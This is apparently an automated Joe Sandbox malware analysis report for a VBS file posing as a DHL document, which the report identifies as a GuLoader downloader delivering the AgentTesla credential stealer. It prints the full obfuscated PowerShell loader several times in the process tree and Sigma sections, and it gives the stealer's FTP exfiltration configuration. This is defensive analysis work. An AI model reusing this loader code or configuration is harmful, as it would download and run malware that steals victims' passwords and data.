Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_RF_20200712_BN_N0095673441.vbs

Overview

General Information

Sample name:DHL_RF_20200712_BN_N0095673441.vbs
Analysis ID:1430128
MD5:3ed2e1ab2cf97a15766d46588a8e1470
SHA1:9e162dfd21865fce19f4dbd061e6d97ebcb39cf5
SHA256:297ec7d2a4002e4b4dc52186f528e0853c231a110fc28b14c909db702c25ae7e
Tags:AgentTeslaDHLvbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6764 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 396 cmdline: ping google.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PING.EXE (PID: 5016 cmdline: ping %.%.%.% MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4464 cmdline: C:\Windows\system32\cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSt.lavulselrsvippkKoder. KyllDOpry o F,brw evisnStemmlEvapooCenteaJob udobfusFBohavi Melkl amseepunkt(Su.pr$ UsliFFremmo ortrJagttuI depnViderdAnensebathon OphodPreapeBaddesParti7Ra,df9Caust,Un.us$va teUSkrppdDe aif Del aKvat.k Skllt nor uWh,lar Svine.aporrTectoeAngaksSttt.) agis ';$Prostatectomy=$Femogtyvende[1]+$Prostatectomy;$Udfaktureres=$Femogtyvende[0];Halvkusinen (Posthoc168 'For,t$SodavgSincelHealdoM.rmebB arbaDevoclTrans:ExitiPCurieaRrpospModvipbagtaeL.courDiasts Mome=Glets( Ma,oT ,iree,uculs .epitMikro-Ve.zePBelloaAnamnt stroh P.ly Bur $ForstUBevged Abjuf P.shaMam.lkStepptHastiuPolicr Bl,deKvabtr IkoneT,ykssDelpr)Bulim ');while (!$Pappers) {Halvkusinen (Posthoc168 'Explo$U,congRecomlResheoForpabWitheaWakfblShaik:FniseASlutsdDr,err StaviKo.fraSyfiltGr sei Mcnac St,i=Vexat$Bowlit .utcrnjereuA,steeRefor ') ;Halvkusinen $Prostatectomy;Halvkusinen (Posthoc168 ' OutpShjisotTrineaPrionrTranstxanth-StearSFootllOplage.ubcoeYd,evpWorl R neb4Autom ');Halvkusinen (Posthoc168 'Yuruc$NonchgKar elGjaldo yvabskaglaBil.ylMatte:SphegP spanaUddykpInfr,pnegate t,nkrFeriesB.nkr=Koffa(MolteTBa,kaeUnsp.sMinuttGryl -AdsorPSubtia enlt JagthMurst Vands$SolbaUoctard,oilefRotatablnddkFigent,accau MisarIberie edurStoreeLiv.fsUnplu)Yorks ') ;Halvkusinen (Posthoc168 'Petey$ G,nngSknsalT,llgo Lewdb ForeaeraselTag i:Ga.glCOveraoMul,iiFo fasMisdat in ir Jug.eSkppelGaransmedic=Undis$MarmigOvermlFlankoForudb mus,a.eserlChief:RefleS.egynkFllesrdsiockForhaiFede.n Nonpd KrsejKl jna Bu.sgG.rmae OpernSkenddNimsheButik+Salth+ ragt%Aroma$BeretTAalbor LinieInt.rdJuleseLambelGla,etI,dekeOriensOrang2Tense0 Tyro.BevikcTelefoKurveuCo,pun ReprtUbeha ') ;$Forundendes79=$Tredeltes20[$Coistrels];}Halvkusinen (Posthoc168 'Tim.r$ ErhvgFaarelWepmaoSpo.ibdamp.aVand lParag:.nchhE.ndesgTa.leo perstSmaadrRevoliAfskepTrumfpBea ueBadedrUndernFor beT emi7 Ta t4Stric ,verv=insou Frs,G SmrbeDamprtLa.kn-underC,isiooSmeltn Verst AceteSculpnSjleat d,ct Tilsy$M.nsuUCoel.d depofEscudaSaddlkKa yotRituauFrostr IndeeCykelrMofuseOplyssGeote ');Halvkusinen (Posthoc168 'N.nag$ExpelgDriftlBejaboEnajibHelteaHovedl Spec:OvertU KbesnBagdel,illiaGingeb Trucoe rovrDef.naPostibAb eslEkstre P.el B.ann= Chel Rusf[Ulv,mSSelskyKngtesAlbantPynteeSivebm Egot.FraseCS midoColomnSybilvOmraaeGonorrHochet Int ]Spytk:Humor:Evoc.F egimr.astroBesvrmKasseBenkelaSkaktsNordieLgg,r6Tu,en4BortfSOpalitMesmer langi DilanThromgFolke( Thym$Om,ryENoneqg Te.eoSyn,etUngerrBrakeiMastopAsbespBttefeArbejrAlbugnBouileRhy,o7 Mote4Sp,ba) Traa ');Halvkusinen (Posthoc168 ' Tilb$Mi,jbgMartelDustpoBekenb,peraaMeratlRiffe:P enoGOuthueRegnmmLika,iTitantNonreoGobblrCykeliKvderaFo,holOr.er St,er=Lnmo. Udrug[ ManaSCoalsyA iensp.cistSpinne KravmVestl.Souh TGldsbeScallxDarkitYpper. plauEGennenEftercHyp.koInferdSpi eiStrygnVade.gAnne.]Candi: Lovf: MiniA LyslSSkjolC ,orsIEjakuI Arch.SuperGMorkieDagvrtCruceS.igortSuperr S,eri oastnLootegAnker(It.ne$C angU onflnKashal UnglaTilsab MaaloUdnvnrGuan,aHemlobSolvelSakseeOleog)Blikv ');Halvkusinen (Posthoc168 'Anlac$EkspogConfilGat woBladsbFrdigaTandhlK.ltu:T,dstTD,flur .ropsdeba.kRimesoSpintm Reala .medgEnsafeCh.derBor le El cnOv.rd=Ora.g$CaeciG PseueKan,nmevaneiPreext BadgoThaierSpgeniKultuaOctavlOmlss.,rodusStjgeu ,eribTogl,s Udbytdukk r,depuiBaandnPyromgEuroe(unbeh3 Mont0Vacci3M,deb4Blond2Nesto3 Sneg, unde2Cliff9.stro4Recep2Unsto8 L ve).amme ');Halvkusinen $Trskomageren;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7256 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7332 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSt.lavulselrsvippkKoder. KyllDOpry o F,brw evisnStemmlEvapooCenteaJob udobfusFBohavi Melkl amseepunkt(Su.pr$ UsliFFremmo ortrJagttuI depnViderdAnensebathon OphodPreapeBaddesParti7Ra,df9Caust,Un.us$va teUSkrppdDe aif Del aKvat.k Skllt nor uWh,lar Svine.aporrTectoeAngaksSttt.) agis ';$Prostatectomy=$Femogtyvende[1]+$Prostatectomy;$Udfaktureres=$Femogtyvende[0];Halvkusinen (Posthoc168 'For,t$SodavgSincelHealdoM.rmebB arbaDevoclTrans:ExitiPCurieaRrpospModvipbagtaeL.courDiasts Mome=Glets( Ma,oT ,iree,uculs .epitMikro-Ve.zePBelloaAnamnt stroh P.ly Bur $ForstUBevged Abjuf P.shaMam.lkStepptHastiuPolicr Bl,deKvabtr IkoneT,ykssDelpr)Bulim ');while (!$Pappers) {Halvkusinen (Posthoc168 'Explo$U,congRecomlResheoForpabWitheaWakfblShaik:FniseASlutsdDr,err StaviKo.fraSyfiltGr sei Mcnac St,i=Vexat$Bowlit .utcrnjereuA,steeRefor ') ;Halvkusinen $Prostatectomy;Halvkusinen (Posthoc168 ' OutpShjisotTrineaPrionrTranstxanth-StearSFootllOplage.ubcoeYd,evpWorl R neb4Autom ');Halvkusinen (Posthoc168 'Yuruc$NonchgKar elGjaldo yvabskaglaBil.ylMatte:SphegP spanaUddykpInfr,pnegate t,nkrFeriesB.nkr=Koffa(MolteTBa,kaeUnsp.sMinuttGryl -AdsorPSubtia enlt JagthMurst Vands$SolbaUoctard,oilefRotatablnddkFigent,accau MisarIberie edurStoreeLiv.fsUnplu)Yorks ') ;Halvkusinen (Posthoc168 'Petey$ G,nngSknsalT,llgo Lewdb ForeaeraselTag i:Ga.glCOveraoMul,iiFo fasMisdat in ir Jug.eSkppelGaransmedic=Undis$MarmigOvermlFlankoForudb mus,a.eserlChief:RefleS.egynkFllesrdsiockForhaiFede.n Nonpd KrsejKl jna Bu.sgG.rmae OpernSkenddNimsheButik+Salth+ ragt%Aroma$BeretTAalbor LinieInt.rdJuleseLambelGla,etI,dekeOriensOrang2Tense0 Tyro.BevikcTelefoKurveuCo,pun ReprtUbeha ') ;$Forundendes79=$Tredeltes20[$Coistrels];}Halvkusinen (Posthoc168 'Tim.r$ ErhvgFaarelWepmaoSpo.ibdamp.aVand lParag:.nchhE.ndesgTa.leo perstSmaadrRevoliAfskepTrumfpBea ueBadedrUndernFor beT emi7 Ta t4Stric ,verv=insou Frs,G SmrbeDamprtLa.kn-underC,isiooSmeltn Verst AceteSculpnSjleat d,ct Tilsy$M.nsuUCoel.d depofEscudaSaddlkKa yotRituauFrostr IndeeCykelrMofuseOplyssGeote ');Halvkusinen (Posthoc168 'N.nag$ExpelgDriftlBejaboEnajibHelteaHovedl Spec:OvertU KbesnBagdel,illiaGingeb Trucoe rovrDef.naPostibAb eslEkstre P.el B.ann= Chel Rusf[Ulv,mSSelskyKngtesAlbantPynteeSivebm Egot.FraseCS midoColomnSybilvOmraaeGonorrHochet Int ]Spytk:Humor:Evoc.F egimr.astroBesvrmKasseBenkelaSkaktsNordieLgg,r6Tu,en4BortfSOpalitMesmer langi DilanThromgFolke( Thym$Om,ryENoneqg Te.eoSyn,etUngerrBrakeiMastopAsbespBttefeArbejrAlbugnBouileRhy,o7 Mote4Sp,ba) Traa ');Halvkusinen (Posthoc168 ' Tilb$Mi,jbgMartelDustpoBekenb,peraaMeratlRiffe:P enoGOuthueRegnmmLika,iTitantNonreoGobblrCykeliKvderaFo,holOr.er St,er=Lnmo. Udrug[ ManaSCoalsyA iensp.cistSpinne KravmVestl.Souh TGldsbeScallxDarkitYpper. plauEGennenEftercHyp.koInferdSpi eiStrygnVade.gAnne.]Candi: Lovf: MiniA LyslSSkjolC ,orsIEjakuI Arch.SuperGMorkieDagvrtCruceS.igortSuperr S,eri oastnLootegAnker(It.ne$C angU onflnKashal UnglaTilsab MaaloUdnvnrGuan,aHemlobSolvelSakseeOleog)Blikv ');Halvkusinen (Posthoc168 'Anlac$EkspogConfilGat woBladsbFrdigaTandhlK.ltu:T,dstTD,flur .ropsdeba.kRimesoSpintm Reala .medgEnsafeCh.derBor le El cnOv.rd=Ora.g$CaeciG PseueKan,nmevaneiPreext BadgoThaierSpgeniKultuaOctavlOmlss.,rodusStjgeu ,eribTogl,s Udbytdukk r,depuiBaandnPyromgEuroe(unbeh3 Mont0Vacci3M,deb4Blond2Nesto3 Sneg, unde2Cliff9.stro4Recep2Unsto8 L ve).amme ');Halvkusinen $Trskomageren;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7420 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7856 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2971575193.00000000245EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000F.00000002.2955442534.0000000003D44000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000A.00000002.2280052237.00000000063C4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi32_7332.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xe025:$b2: ::FromBase64String(
            • 0xd0fa:$s1: -join
            • 0x68a6:$s4: +=
            • 0x6968:$s4: +=
            • 0xab8f:$s4: +=
            • 0xccac:$s4: +=
            • 0xcf96:$s4: +=
            • 0xd0dc:$s4: +=
            • 0x171fc:$s4: +=
            • 0x1727c:$s4: +=
            • 0x17342:$s4: +=
            • 0x173c2:$s4: +=
            • 0x17598:$s4: +=
            • 0x1761c:$s4: +=
            • 0xd8c4:$e4: Get-WmiObject
            • 0xdab3:$e4: Get-Process
            • 0xdb0b:$e4: Start-Process
            • 0x15d25:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs", ProcessId: 6764, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs", ProcessId: 6764, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSt.lavulselrsvippkKoder. KyllDOpry o F,brw evisnStemmlE

            Snort Signatures

            No Snort rule has matched

